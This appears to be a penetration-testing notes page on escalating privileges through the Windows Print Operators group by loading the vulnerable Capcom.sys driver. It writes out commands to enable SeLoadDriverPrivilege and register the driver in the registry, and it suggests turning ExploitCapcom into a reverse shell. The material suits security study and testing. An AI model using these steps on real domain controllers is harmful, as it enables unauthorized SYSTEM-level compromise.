Print Operators

ABOUT

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

Capcom Driver Abuse

The plan is to use EnableSeLoadDriverPrivilege script [LINK] to enable SeLoadDriverPrivilege. Then we need to load the Capcom.sys [LINK] driver, which was used originally as a anti-cheat for Capcom games, but it also have functionality to allow any user to execute shellcode with SYSTEM privileges. Then we make a Registry key and edit it for Capcom.sys to be seen. Then we check it with DriverView [LINK]. After we verified that info, we are using ExploitCapcom script [LINK] to get SYSTEM shell.

OR we can change code of ExploitCapcom to make a reverse shell for us (if we have no GUI access).

Check privs

C:\> whoami /priv

EnableSeLoadPrivilege

C:\> .\EnableSeLoadDriverPrivilege.exe

Add Reference to Driver

You need to download Capcom.sys to C:\temp. Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree.

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\temp\Capcom.sys"

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

Verify Driver

Exploiting

Same stuff but automated

We can use EoPLoadDriver [LINK] script to automate process of enabling the privilege, creating the registry key, and executing NTLoadDriver to load the driver by using this command.

NO GUI

For that we need to find ExploitCapcom.cpp. change string below and recompile.

Cleanup

For a little clean up we could just delete registry key we made before.

PreviousServer OperatorsNextDnsAdmins